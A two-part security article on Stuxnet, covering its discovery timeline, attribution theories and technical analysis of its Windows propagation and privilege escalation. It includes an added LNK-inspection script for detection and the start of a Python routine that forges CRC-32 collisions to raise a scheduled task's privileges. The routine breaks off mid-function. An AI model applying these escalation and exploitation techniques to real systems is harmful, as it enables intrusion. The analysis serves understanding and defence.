STUXNET PART I: HISTORY, MYTHS AND REALITIES

Stuxnet, elected malware of the year

It would have been inconceivable not to devote an article to THE malware of the year 2010. Although nearly everything has already been said on this subject, we could not resist wanting to write an article on Stuxnet several months after the media buzz has subsided. Much is still obscure concerning this malware, its origins and its developers. However, we will try to give a summary, also taking an objective view in relation to various papers covering the subject.

If there is one thing to remember about 2010, it is surely the case of Stuxnet. This is because this malware, specifically produced to carry out the second highly-publicized targeted attack of 2010 (after Aurora), caused comment for more than six months! This article is intended as a summary of this long period, which was punctuated by many new developments. It covers the development of the discoveries and announcements that took place during this period and tries to analyze all the facts in order to draw conclusions. Between reminders on technical matters, genuine rumors and false realities, this article will appraise the situation as completely as possible.

Preliminary reminders

Stuxnet is a complex piece of malware constructed from many items, intended to sabotage the normal functioning of certain critical systems. In contrast to the somewhat indiscreet approach which is used to access these sensitive systems, this sabotage is intended to be very discreet.

To approach its target, Stuxnet exploits at least four zero-day vulnerabilities (currently all corrected by Microsoft) targeting different versions of Windows, as well as the famous MS08-067 vulnerability that was corrected several years ago. To quickly reach its target, the malware also uses a password defined by default within certain SCADA (Supervisory Control And Data Acquisition) systems. This is based on the Siemens SIMATIC WinCC software.

Thanks to all the work performed by various researchers with an interest in malware, the role of Stuxnet has been clarified. The malicious code acts in several stages: firstly, a removable item of storage media is used to compromise a system on a local network. Once present on a network, the malware replicates, moving towards the discovery of a point of access to its target: a system on which WinCC is installed.

Secondly, when such a target is discovered, the behavior of the various items controlling the target architecture is modified in order to physically impair the integrity of the industrial production system. In the case of Stuxnet, this concerns modifying the normal function of certain critical systems by manipulating their controllers.
History

It is difficult to create a comprehensive history of the events relative to Stuxnet because of the numerous new developments and announcements during this long period. Limiting ourselves to the dates of the discoveries made and publicized by the researchers would not really make sense. It is necessary to consider the period before the media took an interest in this subject, as this attack is so complex. We are therefore going to try, with hindsight, to trace a history that takes into account the dates before the beginning of the media interest in this sabotage campaign. Also, all this takes into account discoveries made after this attack attracted media interest.

From Stuxnet

Everything officially began on 17 June 2010, when the Belarusian company Virusblokada published a report on the virus RootkitTmphider, mentioning the LNK security vulnerability. This vulnerability, which was zero-day in June 2010, allows a pirate to execute code when opening a directory, whether it is shared (SMB, WebDAV), local or on a mass-storage peripheral (external hard disk, USB drive, portable telephone, MP3 player, etc.). The vulnerability gradually began to arouse comment. MITRE dedicated reference CVE-2010-2568 to it the following 30 June, and on 13 July, Symantec added the detection of this virus under the name of W32.Temphid.

The next day, on 14 July, MITRE assigned references CVE-2010-2729 and CVE-2010-2743 to security vulnerabilities present in the print spooler and in the keyboard management. Two days afterwards, on 16 July, Microsoft published a security alert referenced KB2286198. This last concerned the security vulnerability exploited by the malware. The management of LNK files was then clearly identified as problematic by the software publisher. At the same time, VeriSign revoked the certificate belonging to Realtek Semiconductor Corp. This was because it had been used by pirates to sign certain drivers used by their malware. Symantec subsequently revealed that the first malware, which had a driver signed by the certificate and which was identified as coming from the Stuxnet family, went back to January 2010.

On 17 July, the antivirus publisher ESET detected new malware coming from the Stuxnet family. This used a certificate belonging to JMicron Technology Corp. to sign one of its components. On 19 July, a year after ivanlef0u had published a proof of concept, the researcher HD Moore published exploitation code within the Metasploit framework. This allowed control of a system to be taken over remotely by exploiting the security vulnerability through WebDAV sharing. This code allowed a pirate simply to encourage an Internet user to visit a web page with Internet Explorer to take control of the underlying system. The same day Symantec renamed W32.Temphid to W32.Stuxnet, and Siemens reported that the company was in the process of studying reports referring to the compromise of several SCADA systems linked to WinCC.

On 20 July, Symantec announced that it had discovered how the malware communicated with its command and control (C&C) servers, and the meaning of the exchanged messages. On 21 July, MITRE assigned reference CVE-2010-2772 to the security vulnerability present within the Simatic WinCC and PCS 7 software from Siemens. A password had been hard-coded and could be used to access certain components of Siemens applications with elevated privileges. Two days afterwards, on 23 July, VeriSign revoked the certificate belonging to JMicron Technology Corp.

Then several days passed, during which the researchers and specialists involved in this study certainly did not stop working. On 2 August, outside its "Patch Tuesday" cycle, Microsoft published its security bulletin MS10-046 proposing several patches for the LNK vulnerability. On 6 August, Symantec presented the method used by Stuxnet to inject and hide code on a PLC (Programmable Logic Controller).

On 14 September, Microsoft published a new security bulletin (MS10-061) and offered a patch for the security vulnerability present within the print spooler that was discovered by Symantec in August. The same day, MITRE assigned reference CVE-2010-3338 to the "elevation of privileges" vulnerability that was identified within the task scheduler. Just several days afterwards, on 17 September, Joshua J. Drake (jduck1337) published exploitation code within the Metasploit framework. This allowed control to be taken of a system via the security
vulnerability present within the Windows print spooler. Lastly, to end the month of September, the publishers of the antivirus solutions ESET and Symantec published a first version of their report, on 30 September, presenting their almost-complete analyses of the malware. In fact, both publishers did not wish to disclose information on vulnerabilities that had not yet been corrected by Microsoft. The following month, on 20 November, Joshua J. Drake published new exploitation code within the Metasploit framework to exploit the vulnerability present within the Windows task scheduler. Finally, to prevent the exploitation of the last security vulnerability exploited by Stuxnet, Microsoft, on its "Patch Tuesday" of 12 October, published its security bulletin MS10-073 that gave a patch for the vulnerability related to the management of the keyboard. Then, after two months of waiting, in its "Patch Tuesday" of 14 December, Microsoft published its security bulletin MS10-092 offering a patch to correct the security vulnerability related to the task scheduler.

The progress made by Ralph Langner

Thanks to the work done by the German researcher Ralph Langner, which began as soon as the media began to take an interest in the malware, it has been possible to identify numerous trails related to the origin of Stuxnet, to its potential targets and to the people who are hiding behind this attack. Of course, all information published by this former psychologist should be treated with caution. Even so, it appears, with hindsight, that many opinions that he gave have been subsequently validated by other researchers (such as Symantec) or by documents coming from third-party sources.

On 16 September, Langner announced that Iran, and particularly the nuclear power station at Bushehr, which was built in cooperation with Russia, was the main target. The researcher was also the first to speak of cyber war. On each following day, he published new hypotheses and new discoveries. The researcher approached numerous entities, such as Congress, the DHS and the INL in the United States, and also appeared on television. On 13 November, Langner announced, just after Symantec, that he had come to the same conclusions concerning the malicious code 315 and the PLCs targeted. He took advantage of this to present the K-1000-60/3000-3 steam turbines manufactured by the Russian manufacturer "Power Machines" which, according to him, equipped the Bushehr nuclear plant. The following day, he presented his analysis concerning the entity that probably ordered this attack: for him, only a government could have been involved in such a scenario: the complexity of the knowledge that was necessary, the human and material resources necessary and lastly, the cost of such an organization make certain countries ideal suspects. Among the list chosen by the researcher were Israel, the United States, Germany and Russia.

On 15 November, Langner presented a technical solution allowing the malicious code 315 to destroy gas centrifuges. He was then supported by the nuclear specialist from ISIS (Institute for Science and International Security), David Albright. On the same day, a second announcement gave the details of the attack performed by the code 417. In the days that followed, numerous details of this second attack were presented and a hypothesis concerning the targets was given: according to the researcher, the code 315 targeted the IR-1 centrifuges present in the Natanz enrichment centre, while module 417 targeted the steam turbines in the electrical power station at Bushehr. A single weapon, malware, which contained two payloads: the code modules 315 and 417, targeting different PLCs.

At the end of November, the former psychologist announced that Iran and Venezuela had concluded an agreement in 2008. This alliance allowed Iran to install ballistic missiles on Venezuelan territory in exchange for
the help provided by Iran in setting up a nuclear program in the host country. A situation in which the United States would surely not be delighted to find itself; and therefore, in his opinion, a justification for the establishment of this secret program.

At the end of December, helped by the publication of the report from ISIS, which gave an analysis of the nuclear infrastructure situation reported by the inspectors from the International Atomic Energy Agency (IAEA), Langner announced that he had discovered the precise target of the malware, and more precisely, of block 417. This was the safety system associated with cascades of centrifuges used to enrich uranium. In his opinion, the PLCs targeted were used every two years in the functioning of an enrichment centre such as Natanz.

At the beginning of January, the researcher presented a new hypothesis on the role of blocks 315 and 417. According to him, their main objective was not the destruction of the centrifuges, but rather to make these production systems massively inefficient. By analyzing the data embedded in the code, and theoretical calculations on the yield of uranium production, the researcher discovered that the operations performed by the two blocks of code would drastically reduce the yield of the centrifuges. To summarize, over the course of these few months, Langner was probably the researcher who communicated most concerning Stuxnet.

The "New York Times" theory

For the first time since the beginning of this scenario, an article published by the New York Times on 16 January described a plausible scenario. Even though this scenario is based more on a correlation between events and facts, rather than on tangible proof, these authors have the distinction of being among the first to officially name the various protagonists. It should therefore be taken with caution and is the responsibility only of the journalists who wrote the New York Times article.

In this scenario, the United States set up a plan to hinder Iran in its quest to produce nuclear weapons. According to the journalists, President Bush gave his agreement, one month before the end of his term of office in January 2009, to the establishment of a secret program aiming to sabotage the electrical and computer systems at the main uranium enrichment centre at Natanz. From the beginning of his term of office, Barack Obama, who had been informed of this before taking office, accelerated this program on the advice of those knowledgeable concerning the case of Iran.

Still according to the New York Times journalists, this program was based on work performed at the Idaho National Laboratory (INL) in partnership with the Department of Homeland Security (DHS) and Siemens. During 2008, they claim that Siemens requested the INL to test the security of its Step7 software used to control a set of industrial systems (tools, probes, etc.), using controllers such as PCS7 (Process Control System 7). The results obtained, including numerous security vulnerabilities, were presented in July at a conference that was held in Chicago.

Several months later, American diplomacy succeeded in establishing an embargo on certain components necessary to the correct functioning of a uranium enrichment centre. According to a diplomatic cable
revealed by Wikileaks, in April 2009, 111 Siemens controllers necessary to controlling a uranium enrichment cascade were therefore blocked at the port of Dubai in the United Arab Emirates.

At the end of 2010, the Institute for Science and International Security (ISIS) reported that 984 defective controllers had been replaced at the end of 2009 according to a report by inspectors from the IAEA. Strangely, this figure exactly corresponds to the number of Siemens controllers contained within an enrichment cascade. Nevertheless, what is the relationship between these 984 defective controllers and Stuxnet? These controllers were replaced between the end of 2009 and the beginning of 2010, while Stuxnet made its first public appearance at the beginning of 2010 although it was not yet identified.

The article presents Israel as a principal ally of the United States in manufacturing and testing this malware. This "small" country, which is highly advanced technologically, and particularly in cyber-warfare, is alleged to have built a replica of the Natanz enrichment centre in its own nuclear research centre: Dimona. The journalists gave two reasons for this alliance. Among the Americans' other allies, none of them would be able to make the IR-1 centrifuges work properly. These were derived from the Pakistani P-1, which themselves were copied from plans of the German G-1 stolen by the doctor of physics Abdul Qadeer Khan (father of the Pakistani nuclear bomb and in charge of a network specialized in the sale of nuclear material that helped to spread sensitive technology to Iran, North Korea and Libya). The second reason was that Israel had long been openly seeking to prevent Iran from obtaining nuclear weapons.

According to the authors of this article, other information revealed the magnitude of this American program. Massoud Ali Mohammadi, an Iranian nuclear specialist, was killed in January 2010 by an explosion caused by a remotely-triggered bomb fixed to a motorbike. On 29 November 2010, when Iran recognized for the first time that Natanz had suffered damage related to Stuxnet, a second physicist, Majid Shahriari, was the victim of a second fatal "accident". On both of these occasions, president Mahmoud Ahmadinejad directly accused the United States and Israel of having ordered these assassinations. After this second suspect event, the Iranians took the decision to "hide" Mohsen Fakrizadeh, the third (and last?) nuclear specialist.

Forbes's counter theory

Another article published by journalists at Forbes the following day strongly criticized this analysis. According to them, this was based on no tangible proof. Only gestures made by certain diplomats at press conferences and the content of several diplomatic cables revealed by Wikileaks gave any support to the journalists' article.

The journalists took advantage of trashing this theory to push their own analysis that was published in December. According to them, the "real" powers behind Stuxnet were Finland and China. The reasoning behind this was that Vacon, the Finnish manufacturer of frequency converters (variable frequency drives), had a manufacturing plant in China. This would mean that China would know precisely which PLCs to target. Furthermore, China is suspected to have access to part of the source code of Windows, which could explain the discovery and use of four zero-day vulnerabilities.
Numerous other details relating China and Finland were also revealed by the journalists to support their theory. For example, RealTek Semiconductor, the Taiwanese company whose certificate was stolen to sign the drivers, has an establishment in the industrial zone of Suzhou, in China, not far from Vacon. Finally, China was relatively untouched by the worm.

Lastly, very many international experts criticized the quality of the code in the malware. Several commentators criticized the amateurism of certain functionalities of Stuxnet: the very basic component that communicates with the C&C servers (for example, no communications encryption, the lack of robustness of the control servers, etc.), the absence of additional protection (polymorphism, anti-debug and robust encryption), and finally an indiscreet means of proliferation that is unworthy of an attack carried out discreetly by the military, etc. According to these commentators, just these observations are evidence that no government is hiding behind Stuxnet.

The other factors to be remembered

On 9 July, the Indian satellite INSAT-4B was declared inoperable. This satellite, which was used for transmitting telecommunications, television broadcasting, meteorology and for individual search and rescue, was controlled by a SCADA system based on Siemens S7-400 and SIMATIC WinCC PLCs. This announcement occurred during a complex period in Indo-Chinese relationships, because both countries are fiercely competing with each other in the aerospace sector to be the first Asian country to put a man on the moon.

Although Symantec and other publishers of anti-virus software named Iran as the main victim of Stuxnet, it was not before mid-October that the subject of Stuxnet was publicly mentioned by Iran. During this first speech, the Iranian president simply denied the damage that the worm was supposed to have caused to national infrastructure. A month later, in November, the country recognized for the first time that it had suffered "slight" problems leading to the postponement of the launch of the Bushehr plant. In reaction to this attack, the government arrested some Russian service contractors suspected of being spies. These were subsequently released.

Since the beginning of 2011, numerous other events were added to this story. Symantec, by recovering samples obtained from various publishers of antivirus software in the market, was able to make a statistical study of the attacks. So, thanks to the 3,280 samples recovered from ESET, F-Secure, Kaspersky, Microsoft, McAfee and Trend Micro, Symantec was able to draw the following conclusions:
- exactly five organizations were targeted; these five organizations are all present in Iran;
- most of the 12,000 infections corresponding to the 3,280 samples can be traced to these various organizations;
- among the victims used as vectors for propagation, three were attacked once, one was targeted twice and the third was attacked three times;
- these attacks took place at very precise dates: in June 2009, one month later in July 2009, then at three further stages in March, April and May 2010;
- lastly, three variants of the malware corresponding to the attacks that took place in June 2009, April 2010 and May 2010 were observed. The existence of a fourth variant is assumed but has not been observed among the samples obtained.

According to Symantec, these five companies are suppliers with links to the Natanz enrichment centre.

From these samples Symantec was able to produce graphs representing the proliferation of the malware. For this, the researchers used the information recorded (date and time, for example) by the malware when it
infects a new system. These graphs clearly highlight the five dates corresponding to the attacks and the number of targets initially contaminated during each of these events.

The day after this announcement, several media echoed another announcement that was particularly surprising. During a video shown at a party given in honor of the retirement of general Gabi Ashkenazi, and published by the conservative newspaper Haaretz, it was claimed that the newly-retired general had supervised the creation of Stuxnet. Nevertheless, as no official Israeli source has corroborated this announcement, it must be taken with caution.

The warning signs

The Stuxnet affair began well before 2010. Thus, Symantec was able to find traces of the malware going back to 2008. On 20 November 2008, Symantec observed the exploitation of the LNK vulnerability for the first time. This had not been analyzed at the time and we had to wait until the appearance of Stuxnet to discover that pirates had known about this vulnerability for more than two years. The virus in question was then identified as "Trojan.Zlob" and does not appear to be related to Stuxnet.

In April 2009, the researcher Carsten Kohler published an article in the magazine Hakin9 presenting a security vulnerability within the Windows print spooler. No one reacted, not even Microsoft, which was clearly concerned! Several months later, in June 2009, Symantec detected a new malware that is now identified as the first version of Stuxnet. This was very simple and did not carry all of the payloads that we know today. According to Symantec, it was in January 2010 that the first malware in the Stuxnet family appeared using the certificate from Realtek Semiconductor Corp. to sign one of the components of the malware. Lastly, it was in March 2010 that the first malware in the Stuxnet family appeared which exploited the LNK vulnerability.

Conclusion

Stuxnet has caused a lot of comment and been highly publicized. The various theories, analyses and hypotheses made until now do not allow any conclusions to be drawn with certainty, either concerning those ordering the attacks or the targets. However, according to the various discoveries made by several researchers and journalists (Symantec, Langner and the New York Times), Iran seems to have been targeted, especially the nuclear enrichment centre at Natanz. Concerning those ordering the attack, and bearing in mind its complexity, the resources used and the different information revealed by the journalists, Israel and the USA appear to have played a role in this affair. We must also bear in mind that all of the information revealed by the various observers is always subjective…
References

Resources on Stuxnet
http://blog.eset.com/2011/01/03/stuxnet-information-and-resources

F-Secure (FAQ)
http://www.f-secure.com/weblog/archives/00002040.html
http://www.f-secure.com/weblog/archives/00002066.html

Timeline
http://www.infracritical.com/papers/stuxnet-timeline.txt

CERT-IST
http://www.cert-ist.com/fra/ressources/Publications_ArticlesBulletins/VersVirusetAntivirus/stuxnet/

New York Times
http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html?pagewanted=all
http://www.nytimes.com/2010/11/30/world/middleeast/30tehran.html?pagewanted=print
http://www.nytimes.com/2010/01/13/world/middleeast/13iran.html?_r=1&pagewanted=print

Forbes
http://blogs.forbes.com/jeffreycarr/2011/01/17/the-new-york-times-fails-to-deliver-stuxnets-creators/?boxes=Homepagechannels
http://blogs.forbes.com/firewall/2010/12/14/stuxnets-finnish-chinese-connection/
STUXNET PART II: TECHNICAL ANALYSIS

Stuxnet, elected malware of the year

After having looked at the history of Stuxnet and the theories and assumptions behind it, let us now look at its technical analysis. Some very good white papers (Symantec and ESET) have given a detailed presentation of the complexity of this malware. We will try to summarize everything to give an understanding of the propagation modes used, the relationships with industrial systems and the consequences that Stuxnet may cause.

Charles Dagouat

General functioning

Stuxnet is a complex piece of malware. Its functioning mode revolves around two main "functions": the propagation of the virus, which is based upon the vulnerabilities inherent in the Windows platform, and the attack on SCADA systems, which is focused on WinCC and PCS7.

This second function corresponds to the payload transported by the malware. It is based on the software component WinCC. WinCC is a very widespread tool for remote monitoring and data acquisition developed by Siemens. Installed on a Windows system, it is used to control an automatic system such as a Programmable Logic Controller (PLC). This type of architecture is particularly adapted to critical infrastructure such as can be found in industry.

To fulfill its task, Stuxnet's functioning is governed by a very specific scenario. The architecture of the malware is built around several main functionalities that correspond to the different stages in the attack process. The first stage is not characteristic of Stuxnet, but corresponds to the majority of worms: it is the propagation phase. During this phase, the malware seeks to spread within a given area: the local network.

The second phase corresponds to the attack itself: this is the search for a target. In the case of Stuxnet, the target is a Siemens WinCC control and monitoring system linked to certain PLCs. If such a system is detected, its behavior is then discreetly impaired. Lastly, the final phase corresponds to the material consequence of this modification. The undetectable effect discreetly acts on the system in order to slowly destroy it.
STUXNET PART II: TECHNICAL ANALYSIS (ACTU SÉCU 27)

Phase I: malware propagation

Phase I of the attack carried out by Stuxnet corresponds to the proliferation of the malware within an installed base of computers. For this, the authors of Stuxnet used no less than four zero-day vulnerabilities targeting various components of Windows. This propagation function may itself be subdivided into two parts: the first corresponds to compromising Windows systems and the second corresponds to the long-term installation of the virus on a compromised system.

The main points of entry chosen by the developers of Stuxnet to penetrate the target infrastructure are removable storage media such as USB drives and other portable hard drives. Those behind the attack are therefore mainly relying on human intervention to carry the virus from one system to another.

Main attack vector: removable storage media

The vulnerability in question is related to how the Windows operating system manages shortcuts. This type of file corresponds to the extensions ".LNK" and ".PIF". More precisely, the vulnerability relates to the way that the icon for the link is loaded. This image is normally loaded from a CPL (Windows Control Panel) file using the system function "LoadLibraryW()". In reality, a CPL file is just a DLL. By specifying the path to a malicious DLL in the "File Location Info" section of a LNK file, an attacker is therefore able to force any Windows system to execute arbitrary code simply by having the content of a directory displayed.

After having officially acknowledged the security vulnerability by publishing the security advisory referenced KB2286198 on 16 July, Microsoft quickly reacted by publishing its bulletin MS10-046 and the associated patches on 2 August, outside its "Patch Tuesday", which was planned for eight days later, on 10 August.

Exploitation of this vulnerability simply requires a user to open a malicious directory. Exploitation code has therefore already been published within the Metasploit framework. Using this, an attacker only needs to get an Internet user to access a URL with Internet Explorer to take control of the remote system: in this proof of concept, the server forces the client to open a shared file using the WebDAV protocol.

A user observing the content of a USB drive infected by Stuxnet can see the following six files:

- Copy of Shortcut to.lnk
- Copy of Copy of Shortcut to.lnk
- Copy of Copy of Copy of Shortcut to.lnk
- Copy of Copy of Copy of Copy of Shortcut to.lnk
- ~WTR4141.TMP
- ~WTR4132.TMP

The various shortcuts entitled "Copy of (...) Shortcut to.lnk" correspond to different versions of Windows. These links all load the library "~WTR4141.TMP" which, in turn, loads the file "~WTR4132.TMP".
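As an added example (this is not code from the article nor from Stuxnet), the following Python script parses a Shell Link file according to the public MS-SHLLINK layout and reports a shortcut whose link target or icon location resolves to a loadable library (.dll, .cpl, .tmp), which is the shape of the MS10-046 abuse described above. It also reproduces the file-name filter that the MrxNet.sys rootkit applies on the USB drive, described in the persistence section of this article: .lnk files of exactly 1,471 bytes and ~WTRabcd.tmp files whose four digits sum to 0 modulo 10. The .lnk bytes and the directory listing are constructed here for the demonstration, and the .tmp file sizes are illustrative.

```python
import re
import struct

# Shell Link (.lnk) constants from the MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01  # LinkInfoFlags
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def build_lnk(local_base_path: str, icon_location: str) -> bytes:
    """Constructed sample: a minimal ANSI .lnk with a LinkInfo block and an ICON_LOCATION string."""
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, HAS_LINK_INFO | HAS_ICON_LOCATION,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    volume_id = struct.pack("<IIII", 0x11, 2, 0, 0x10) + b"\0"  # DRIVE_REMOVABLE, empty label
    base = local_base_path.encode("latin-1") + b"\0"
    hdr = 0x1C
    li_size = hdr + len(volume_id) + len(base) + 1
    link_info = struct.pack("<IIIIIII", li_size, hdr, VOLUME_ID_AND_LOCAL_BASE_PATH,
                            hdr, hdr + len(volume_id), 0, li_size - 1) + volume_id + base + b"\0"
    icon = icon_location.encode("latin-1")
    return header + link_info + struct.pack("<H", len(icon)) + icon


def parse_lnk(data: bytes) -> dict:
    """Extract where the link target and its icon resolve to."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos, info = 0x4C, {"flags": flags}
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip the IDList; its size field excludes itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # the "File Location Info" section of the article
        li_size, _, li_flags, _, base_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
            start = pos + base_off
            info["local_base_path"] = data[start:data.index(b"\0", start)].decode("latin-1")
        pos += li_size
    for bit, name in STRING_FIELDS:  # StringData: 2-byte character count, then characters
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            nbytes = count * 2 if flags & IS_UNICODE else count
            raw = data[pos + 2:pos + 2 + nbytes]
            info[name] = raw.decode("utf-16-le" if flags & IS_UNICODE else "latin-1")
            pos += 2 + nbytes
    return info


LIBRARY_EXTENSIONS = (".dll", ".cpl", ".tmp")
WTR_NAME = re.compile(r"^~WTR(\d)(\d)(\d)(\d)\.TMP$", re.IGNORECASE)


def lnk_findings(info: dict) -> list:
    """A shortcut whose target or icon is a library (not a document or program) is worth a look."""
    return [f"{field} resolves to a library: {info[field]}"
            for field in ("local_base_path", "icon_location")
            if info.get(field, "").lower().endswith(LIBRARY_EXTENSIONS)]


def mrxnet_would_hide(name: str, size: int) -> bool:
    """The rootkit filter as the article states it: .lnk of 1,471 bytes, or ~WTRabcd.tmp with a+b+c+d = 0 mod 10."""
    if name.lower().endswith(".lnk") and size == 1471:
        return True
    m = WTR_NAME.match(name)
    return bool(m) and sum(map(int, m.groups())) % 10 == 0


def triage(listing) -> dict:
    """listing: iterable of (name, size, content-or-None). Returns {name: [reasons]} for suspect entries."""
    report = {}
    for name, size, content in listing:
        reasons = []
        if mrxnet_would_hide(name, size):
            reasons.append("matches the MrxNet.sys hiding filter")
        if name.lower().endswith(".lnk") and content is not None:
            try:
                reasons += lnk_findings(parse_lnk(content))
            except (ValueError, struct.error):
                reasons.append("malformed .lnk")
        if reasons:
            report[name] = reasons
    return report


# Constructed listing of a removable drive (sizes of the .tmp files are illustrative).
SAMPLE_LNK = build_lnk(r"E:\~WTR4141.tmp", r"E:\~WTR4141.tmp")
SAMPLE_LISTING = [("Copy of Shortcut to.lnk", len(SAMPLE_LNK), SAMPLE_LNK),
                  ("~WTR4141.TMP", 25720, None), ("~WTR4132.TMP", 513536, None),
                  ("report.lnk", 1471, None), ("notes.txt", 120, None)]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_LISTING).items():
        print(name, "->", "; ".join(reasons))
```

Run it against a real listing by replacing SAMPLE_LISTING with the names, sizes and bytes read from the drive on a clean machine: the point of reproducing the rootkit's own filter is that a system on which these files are invisible is exactly one on which the driver is active.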
Additional attack vectors: local network

However, Stuxnet does not only rely on help from users to spread. It also uses two other security faults that can be remotely exploited within a local network. The first relates to the Microsoft print spooler, while the second targets the old vulnerability present within the server service (MS08-067).

Print spooler

This security vulnerability was initially presented in the magazine Hakin9 during 2009. When a printer is shared on a system, a user is able to "print" (read and write) files in the "%System%" directory. Exploitation of this security vulnerability takes place in two phases. The first consists of depositing the files "winsta.exe" and "sysnullevnt.mof" respectively in the directories "Windows\System32" and "Windows\System32\wbem\mof". The second phase consists of executing the script "sysnullevnt.mof". This file, in MOF (Managed Object Format), is used to force Windows to execute the code contained in the file "winsta.exe". Execution of this script is automatic, because the MOF files placed in the directory "Windows\System32\wbem\mof" are automatically compiled by "mofcomp.exe", which registers the WMI event subscription that triggers the execution of the script.

This security vulnerability was corrected by Microsoft when it published its bulletin MS10-061, which added a series of checks before allowing a document to be printed.

Server service

Lastly, Stuxnet exploits the old MS08-067 security vulnerability in the server service. This vulnerability, which at the time was massively exploited by Conficker/Downadup, is used here to deposit a file in shared directories of the C$ or Admin$ type. The execution of this file is scheduled for the day following compromise, using the task scheduler. It appears that the shellcode used by the malware to carry out these two actions is relatively advanced, in contrast to that which was used by Conficker. This security vulnerability was corrected by Microsoft when it published bulletin MS08-067.

The exploitation of these various security vulnerabilities allows the malware to distribute itself both on a local network and, more widely, on all systems to which users can connect removable storage media. Once installed on a Windows system, the malware has several functionalities that allow it to work as part of a network. Among these, the malware installs an RPC server that allows it to exchange various items of information with other infected systems present on the LAN.

INFO: Free tools for getting rid of malware, including Stuxnet

BitDefender and Microsoft have just made free tools available for getting rid of the most currently fashionable malware. After publishing a tool last month for getting rid of Zeus (see CXA-2010-1211), BitDefender has just published another tool for deleting the Stuxnet malware. As a reminder, the malware was detected for the first time by a company based in Belarus (see CXA-2010-0893), following the discovery of the zero-day LNK security vulnerability affecting all versions of Windows (see CXA-2010-0906).

Microsoft has just updated its "Malicious Software Removal Tool", which can now deal with the most virulent botnet that is currently known: Zeus/ZBot. Zeus is malware that is constantly being developed, and which mainly aims to steal banking information.

The two tools can be downloaded via the following links:

Stuxnet: http://www.malwarecity.com/community/index.php?app=downloads&showfile=12

Zbot: http://blogs.technet.com/b/mmpc/archive/2010/10/12/msrt-on-zbot-the-botnet-in-a-box.aspx
Phase II: installation of the malware

The long-term installation of the malware requires certain actions that involve elevated privileges. The exploitation of the security vulnerabilities presented previously does not allow elevated privileges to be obtained. In order to ensure maximum dissemination, two security vulnerabilities are therefore exploited by Stuxnet in order to elevate its privileges once the system has been compromised.

Between them, these two vulnerabilities cover the versions of Windows in use (with the reservation noted below concerning Windows Server 2003). The first can locally elevate privileges on old versions of the operating system, Windows 2000 and XP, while the second can perform the same operation on more recent versions of the OS: Windows Vista, 7 and 2008.

The first vulnerability relates to the way the keyboard layout is managed by the driver "Win32k.sys". An index is loaded from a shared library without verification. This operation allows the malware to force the system's kernel to execute code controlled from user mode. This security vulnerability is described in detail in the article on page 29 and was corrected by Microsoft when it published its bulletin MS10-073, which added a check to prevent the use of an index that overflows the associated data table.

The second vulnerability relates to the task scheduler. The definition of a task is stored in an ordinary XML file contained in the directory "%SystemRoot%\system32\Tasks". Access to this directory is restricted. Even so, an XML file (corresponding to a task) contained in it is accessible and can be written to by the user who added it. Secondly, the XML description file contains, among other things, information related to the execution of the task, for example the user and the required level of privileges. A user who defined a task can therefore freely change the user identifier and the level of privileges required, in order to elevate privileges.

To protect against this type of attack, Microsoft had introduced a "security feature" which calculates a hash of the file corresponding to a task when it is defined. This hash is checked before the task is executed. But the CRC32 algorithm used for calculating this hash is unfortunately not designed for security purposes. It is too weak to fulfill this role because it is relatively easy to produce collisions: it is actually nothing more than a straightforward CRC calculation over the XML file. By adding data into a comment field, it is therefore easy to produce a valid file with the same hash as the original, after it has been modified.

Stuxnet therefore adds a task, calculates the associated CRC32 hash, "manually" changes the file to raise the privileges associated with it, adds a comment field and fills it with data chosen to provoke a collision. The task is then executed with the highest privileges.

This security vulnerability was corrected by Microsoft when it published bulletin MS10-092, which changed the hash function used: CRC-32 was replaced by SHA-256, an algorithm considered secure against collision attacks.

There remains an unknown factor. According to Microsoft, these two security vulnerabilities respectively targeted Windows XP and 2000 for the keyboard layout management, and Windows Vista, 7 and 2008 for the task scheduler. It would appear that the technique used by Stuxnet to install itself on Windows Server 2003 is unknown, or that the malware has excluded this platform from its targets.

Ludo Benoit
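The task scheduler weakness above is worth seeing in code, because "provoking a collision" on a CRC-32 does not require luck: the CRC is linear over GF(2), so for any prefix and suffix one can solve directly for four bytes that bring the checksum to any chosen value, instead of trying random fillers (which would need on the order of 2^32 attempts). The following Python is an added example written for this article, not Stuxnet's code: it rewrites the user and run level of a constructed task definition, then appends a comment whose padding restores the original CRC-32. The sample XML is plain ASCII for readability (on-disk task files are Unicode-encoded, which only changes the byte string fed to the CRC, not the method); the element names and the SID used here are illustrative.

```python
import zlib

# Standard reflected CRC-32 table (polynomial 0xEDB88320); zlib.crc32 computes the same CRC.
_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _TABLE.append(_c)
# The top byte of every table entry is distinct, which is what makes one CRC step invertible.
_REV = {entry >> 24: i for i, entry in enumerate(_TABLE)}
_MASK = 0xFFFFFFFF


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & _MASK


def _state_after(data: bytes) -> int:
    """CRC register after feeding data (zlib's output is the register XOR 0xFFFFFFFF)."""
    return crc32(data) ^ _MASK


def _state_before(suffix: bytes, final_state: int) -> int:
    """Run the register backwards over suffix: the state that must precede it to end at final_state."""
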